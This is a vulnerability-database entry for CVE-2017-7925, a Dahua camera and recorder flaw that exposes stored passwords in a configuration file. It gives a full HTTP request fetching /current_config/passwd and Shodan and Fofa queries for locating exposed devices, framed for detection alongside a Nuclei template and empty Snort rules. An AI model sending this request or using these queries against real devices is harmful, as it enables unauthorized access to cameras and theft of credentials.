🔙 목록으로 돌아가기

CVE-2017-7925: Dahua Security - Configuration File Disclosure

TitleDahua Security - Configuration File Disclosure
AuthorE1A,none
SeverityCritical
ImpactThis vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system.
RemediationTo remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only.
CVSS Score9.8
EPSS Score0.80551
CVE IDCVE-2017-7925
CWE IDCWE-522,CWE-260
Shodan Queryhttp.favicon.hash:2019488876
Fofa Queryicon_hash=2019488876
Tags cve cve2017 dahua camera dahuasecurity vuln

🔍 Vulnerability Description

A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.

🌐 HTTP Request

GET /current_config/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-7925.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-7925.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A